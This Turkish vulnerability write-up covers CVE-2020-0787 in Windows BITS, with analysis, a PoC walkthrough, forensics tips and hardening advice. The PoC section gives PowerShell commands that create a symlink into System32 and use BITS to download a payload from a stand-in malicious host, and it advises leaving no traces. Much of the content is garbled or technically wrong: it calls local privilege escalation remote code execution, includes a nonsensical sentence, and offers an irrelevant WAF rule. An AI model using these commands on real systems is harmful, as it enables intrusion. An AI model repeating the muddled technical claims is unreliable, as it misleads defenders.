CVE-2020-0787 · Bilgilendirme

Microsoft Windows Background Intelligent Transfer Service (BITS) Improper Privilege Management Vulnerability

CVE-2020-0787: Microsoft Windows BITS, sembolik bağlantıları yanlış işleyerek sistem yetkileriyle kod çalıştırılabilir.

Üretici
Microsoft
Ürün
Windows
Seviye
yüksek
Yayın Tarihi
05 Nisan 2026
Okuma
8 dk okuma

CVE-2020-0787: Microsoft Windows Background Intelligent Transfer Service (BITS) Improper Privilege Management Vulnerability

Zorluk Seviyesi: Orta | Kaynak: CISA KEV

Zafiyet Analizi ve Giriş

CVE-2020-0787, Microsoft'un Windows işletim sisteminde bulunan Background Intelligent Transfer Service (BITS) bileşeninde ciddi bir ayrıcalık yükseltme (privilege escalation) zafiyetidir. İlk olarak 2020 yılında keşfedilen bu zafiyet, sembolik bağlantıların (symbolic links) hatalı bir şekilde işlenmesi sonucunda ortaya çıkmaktadır. Zafiyet, saldırganların sistem seviyesinde rastgele kod çalıştırmasına (remote code execution - RCE) olanak tanır. Bilindiği üzere, sistem seviyesinde çalışan bir kodun zararlıları, kritik sistem dosyalarına erişim sağlayarak daha büyük güvenlik tehditlerine yol açabilir.

Zafiyetin arka planına bakıldığında, Windows BITS'in dosya transfer işlemlerini yönetmede kullanılan bir hizmet olduğunu görmekteyiz. BITS, arka planda otomatik güncellemeler ve diğer görevleri gerçekleştirirken, sembolik bağlantıları işleme sürecinde birtakım hatalar meydana gelmektedir. Sembolik bağlantılar, dosya sistemlerinde belirli dosyaların veya klasörlerin başka bir konumda referans alınmasını sağlayarak kullanıcıların ve uygulamaların dosyaları daha kolay bir şekilde yönetmesine olanak tanır. Ancak, zafiyetin istismar edilmesi durumunda, saldırganlar bu sembolik bağlantıları kullanarak kritik dosyalara erişim sağlayabilir ve sistemin kontrolünü ele geçirebilir.

Bu zafiyetten etkilenen sektörler geniş bir yelpazeye yayılmaktadır. Eğitim, finans, sağlık ve kamu sektörü gibi çeşitli alanlarda BITS'in kullanımı yaygındır. Örneğin, bir eğitim kurumunda, uzaktan eğitim için kullanılan bir sistem BITS ile otomatik güncellemeler alıyor olabilir. Burada potansiyel bir saldırgan, zafiyeti istismar ederek eğitim verilerinin ya da hassas öğrenci bilgilerinin ele geçirilmesine yol açabilir. Benzer bir senaryo finans sektöründe de yaşanabilir; bir banka, kritik sistem güncellemelerini BITS üzerinden gerçekleştiriyorsa, bu zafiyet, saldırganların bu güncellemeleri manipüle etmesine ve sonuç olarak müşteri hesaplarına zarar vermesine neden olabilir.

Zafiyetin global çapta yarattığı tehditlerin yanı sıra, daha önceki zafiyetlerde de (örneğin, buffer overflow veya authorization bypass gibi) benzer yöntemler kullanılarak sistemin kontrol edilmesi sağlanmıştır. Bu tür güvenlik açıklarının istismar edilmesi, yalnızca bir sistemin veya uygulamanın değil, aynı zamanda bağlı olduğu tüm ağların güvenliğini tehdit etmektedir. Bu sebeple, bu tür açıkların tespit edilmesi ve kapatılması, bilgi güvenliği uzmanları ve beyaz şapkalı hackerlar için öncelikli bir hedef olmalıdır.

Sonuç olarak, CVE-2020-0787 zafiyeti, Microsoft Windows sistemlerinde BITS’in hatalı sembolik bağlantı yönetimi nedeniyle oluşan kritik bir güvenlik açığıdır. Sistem seviyesinde rastgele kod çalıştırılmasına olanak tanıdığından, bu zafiyetin hızlı bir şekilde kapatılması ve organizasyonlarda güvenlik politikalarının gözden geçirilmesi büyük öneme sahiptir. Zafiyetin etkilerini en aza indirmek ve sistemleri korumak için mevcut güvenlik güncellemelerinin uygulanması, risklerin yönetilmesi adına kritik bir adım olacaktır.

Teknik Sömürü (Exploitation) ve PoC

Microsoft Windows Background Intelligent Transfer Service (BITS) üzerinde bulunan CVE-2020-0787 zafiyeti, bir siber saldırganın sistem üzerinde yetki yükseltme (privilege escalation) gerçekleştirmesine olanak tanır. Bu zafiyet, BITS'in sembolik bağlantıları (symbolic links) yanlış bir şekilde işlemesinden kaynaklanmaktadır. Saldırgan, bu açığı istismar ederek, sistem seviyesinde keyfi kod çalıştırma (RCE - Remote Code Execution) yeteneği kazanabilir. BITS, Windows'taki güncellemeleri ve diğer arka plan transferlerini yöneten kritik bir hizmet olduğundan, bu zafiyet ciddi bir tehdit oluşturur.

Söz konusu zafiyeti istismar etmek için aşağıdaki adımları izlemek gerekmektedir:

  1. Çevreyi Hazırlama: İlk olarak, hedef sistemin ortamını anlamak önemlidir. Bu aşamada, Windows işletim sisteminin versiyonunun zafiyeti barındırıp barındırmadığını kontrol etmek gerekmektedir. Örneğin, Windows 10’un belirli sürümleri bu zafiyeti içermektedir.

  2. Sembolik Bağlantı Oluşturma: Zafiyetten faydalanmak için, saldırganın öncelikle geçerli bir sembolik bağlantı oluşturması gerekmektedir. Bu bağlantı, sistemdeki kritik dosyalara ya da hizmetlerin çalışmasına müdahale edebilir.

   New-Item -ItemType SymbolicLink -Path "C:\example\link.txt" -Target "C:\Windows\System32\desired.exe"
  1. Yetki Yükseltme Denemesi: İlgili sembolik bağlantı oluşturulduktan sonra, BITS hizmetini kullanarak (örneğin, bir dosya indirme isteği göndererek) kendimizi sistem yöneticisi olarak yetkilendirmeye çalışmalıyız. Bu aşamada, BITS hizmetinin düzgün çalışması ve zayıf noktaları tetiklemesi için uygun istekleri oluşturmak önemlidir.
   Start-BitsTransfer -Source "http://malicious.io/maliciouspayload.exe" -Destination "C:\example\link.txt"

  1. Kodu Çalıştırma: Yukarıdaki adımlar başarıyla gerçekleştirilirse, zafiyetin işleyişiyle beraber, kötü niyetli kod sistemde çalıştırılacaktır. Burada önemli olan aşama, çalışan kodun sistemdeki tüm izinlere ulaşabilmesidir.

  2. Sonuç ve İzleme: Söz konusu işlemler tamamlandığında, yapılması gereken en önemli şey kurban sistemden izinsiz erişim testleri yaparak, sistemin durumu ve alınacak önlemler hakkında bilgi edinmektir. Zafiyet sonucu herhangi bir iz bırakmamaya özen gösterilmelidir.

Bu işlem süreci, Volkswagen Taksim'e ya da sahte bir HTTP endpoint'e gönderilen bir istek ile BITS üzerinden kötü amaçlı bir dosya transferi gerçekleştirebilir. Bir siber güvenlik uzmanı olarak, kullanıcıların ve sistemlerin bu tür saldırılara karşı korunması için sürekli eğitimlerine ve zafiyet taramaları yapmalarına önem vermek gereklidir.

Tüm bu süreçler, sadece güvenlik açığı bulmanın ötesine geçerek, gerçek dünya senaryolarında sistem güvenliğini sağlama amacı taşır. Böylece, bir "White Hat Hacker" olarak kurbanların meselelerine çözüm bulma ve kötü niyetli aktörlere karşı savunma geliştirme becerisini artırabiliriz. Unutulmamalıdır ki, etik dışı eylemler asla benimsenmemelidir; zafiyetlerin eğitici bir perspektifle incelenmesi, siber güvenliğin güçlendirilmesine katkı sağlar.

Forensics (Adli Bilişim) ve Log Analizi

CVE-2020-0787, Microsoft Windows'un Background Intelligent Transfer Service (BITS) bileşenindeki bir ayrıcalık yükseltme zafiyetidir. Bu zafiyet, sembolik bağlantıların (symbolic links) hatalı ele alınmasından kaynaklanmaktadır. Kötü niyetli bir aktör, bu zafiyeti kullanarak sistem düzeyinde yetkilere sahip rastgele kod çalıştırabilir. Gerçek dünyada izlenen senaryolar incelendiğinde, bu tür bir zafiyetin kötüye kullanılması, bir saldırganın hedef sistemi ele geçirmesine veya hassas verilere erişmesine yol açabilir. Bu bağlamda, adli bilişim ve log analizi, saldırganların hareketlerini ve sistem üzerindeki etkilerini anlamak için kritik önem arz eder.

Bir siber güvenlik uzmanı, bir sistemde CVE-2020-0787 tarzı bir zafiyetin kullanıldığını tespit etmek için güvenlik olaylarını izlemek ve log dosyalarını analiz etmek zorundadır. Öncelikle, sistemin SIEM (Güvenlik Bilgileri ve Olay Yönetimi) araçlarıyla entegre edilmiş log dosyaları etkili bir başlangıç noktasıdır. Belirli kayıt türleri incelenmelidir:

  1. Erişim Logları (Access Logs): Bu tür loglarda, yetkisiz erişim girişimleri ve olağandışı etkinlikler tespit edilebilir. Saldırganın potansiyel bir erişim noktası oluşturup oluşturmadığını değerlendirmek için, kullanıcı kimlik doğrulama kayıtları ve IP adresi aktiviteleri detaylı bir şekilde incelenmelidir.

  2. Hata Logları (Error Logs): Hata logları, BITS'in düzgün çalışmaması veya beklenmeyen bir durumla karşılaştığında oluşan hataları kaydeder. Özellikle "access denied" (erişim reddedildi) veya "file not found" (dosya bulunamadı) gibi hataların sıklığı, potansiyel bir istismar eylemini gösterebilir.

  3. Olay Logları (Event Logs): Windows olay logları, sistemdeki anormal faaliyetlere dair kapsamlı bilgi sağlar. Örneğin, bir uygulamanın beklenmedik bir şekilde sistem izinlerini artırması veya yeni uygulamaların/kütüphanelerin bilinmeyen kaynaklardan yüklenmesi durumunda, bu olaylara dair kayıtlar dikkatlice incelenmelidir.

Saldırının belirlenmesinde önemli olan imzalar veya göstergeler (signature) arasında aşağıdakiler bulunmaktadır:

  • Sembolik bağlantıların beklenmedik bir şekilde değişimi veya oluşturulması.
  • BITS hizmetinin, yanıltıcı veya şüpheli bir kaynaktan gelen dosyaları aktarımına yönelik aktiviteler.
  • Olağandışı dosya sistem erişimleri, özellikle sistem veya kritik dosyalara yapılan erişimler.

Siber güvenlik uzmanı, bu loglardan ve imzalardan yola çıkarak, sistemdeki potansiyel zayıflıkları tespit edebilir ve gerekli önlemleri alabilir. Ayrıca, saldırganların kullandığı zafiyetlerin bir analizinin yapılması, gelecekteki olası saldırılara karşı savunma mekanizmalarının güçlendirilmesine katkı sağlayacaktır.

Sonuç olarak, adli bilişim ve log analizi, CVE-2020-0787 gibi güvenlik zafiyetlerine karşı etkili bir savunma mekanizması oluşturmanın anahtar yollarından biridir. Kapsamlı bir log analizi, sistem güvenliğini sağlamak ve potansiyel tehditleri zamanında tespit etmek için gereklidir. Bu tür zafiyetlerin etkin bir şekilde yönetilmesi, siber güvenlik alanındaki en iyi uygulamaların ruhunu yansıtmaktadır ve aynı zamanda organizasyonun bilgi güvenliği seviyesini artırmaktadır.

Savunma ve Sıkılaştırma (Hardening)

Microsoft Windows Background Intelligent Transfer Service (BITS) üzerine CVE-2020-0787 zafiyeti, özellikle sistem yöneticileri ve güvenlik uzmanları için önemli bir risk teşkil etmektedir. Bu güvenlik açığı, BITS'in sembolik bağlantıları (symbolic links) yanlış yönetmesi sonucu yaşanabilecek bir yetki yükseltme (privilege escalation) zafiyetidir. Saldırıcılar bu açığı istismar ederek sistem düzeyinde kod çalıştırabilirler, bu da tam bir sistem kontrolü anlamına gelir.

Bir siber güvenlik uzmanı olarak, bu tür zafiyetlere karşı gerekli önlemleri almak, bilgi sistemleri güvenliği açısından hayati öneme sahiptir. CVE-2020-0787'de belirtilen zafiyet, potansiyel olarak kurumsal ağlarda büyük bir tehdit oluşturabilmektedir. Saldırganlar, sistemde yetki kazanarak veritabanlarına, kişisel verilere veya kurumsal projelere erişebilirler. Bu tür siber saldırılar, genellikle hedef sistemde bulunan diğer zafiyetlerle birleştiğinde daha da tehlikeli hale gelir.

Açığı kapatmanın yolları arasında, öncelikle Microsoft'un sunduğu güncellemeleri uygulamak yer alır. Microsoft, BITS ile ilgili bu açığı gidermek için gerekli yamaları sağlamıştır. Yamanın uygulanması, sistemin güvenlik düzeyini artırırken, aynı zamanda zafiyetten yararlanma ihtimalini de ortadan kaldırır. Bunun yanı sıra, sistem yöneticileri, izinleri daha sıkı bir şekilde yapılandırmalı ve yalnızca gerekli olan kullanıcıların belirli sistem bileşenlerine erişimine izin vermelidir.

Ayrıca, alternatif firewall (WAF) kurallarının entegrasyonu, ağ güvenliğini artırmak için önemli bir başka adımdır. Örneğin, aşağıdaki WAF kuralı, BITS trafiğini izleyerek şüpheli faaliyetleri tespit etmeye yardımcı olabilir:

SecRule REQUEST_HEADERS "Background Intelligent Transfer Service" \
  "id:10001, phase:2, deny, log, msg:'BITS service access detected'"

Bu tür kurallar, sistemin potansiyel saldırılara karşı daha dayanıklı olmasına yardımcı olurken, ağ üzerinden gelen kötü niyetli talepleri engelleyebilir.

Kalıcı sıkılaştırma önerileri arasında, gereksiz hizmetlerin devre dışı bırakılması, sistem güncellemelerinin otomatikleştirilmesi ve kullanıcı izinlerinin gözden geçirilmesi yer alır. Gereksiz sistem servislerinin kapatılması, potansiyel saldırı yüzeyini azaltırken, BITS gibi hizmetlerin yalnızca güvenlik açısından denetimli bir şekilde çalışır duruma getirilmesi sağlanır. Ayrıca, düzenli sistem taramaları ve güvenlik testleri yapmak, herhangi bir güvenlik açığı tespit edildiğinde hızlı bir gözlem ve müdahale süreci sağlar.

Son olarak, çalışanlar için güvenlik farkındalığı eğitimi vermek de akan trafiği kontrol altında tutmanın önemli bir yönüdür. Sosyal mühendislik saldırıları, çoğu zaman teknik zafiyetlerden daha etkili bir şekilde sistemlere saldırmak için kullanılır. Çalışanların bu tür saldırılar hakkında eğitilmesi, potansiyel tehlikelere karşı alerjinin artırılmasına yardımcı olur.

Siber güvenlik alanında sürekli gelişim ve adaptasyon sağlamak, BITS gibi hizmetlerdeki zafiyetleri etkili bir şekilde yönetmek için kritik öneme sahiptir. Bunu başarmak, sadece teknik yapıların sağlamlaştırılmasıyla değil, aynı zamanda bir kurumun kültürel yapısının da güvenlik bilinci ile biçimlendirilmesiyle mümkündür.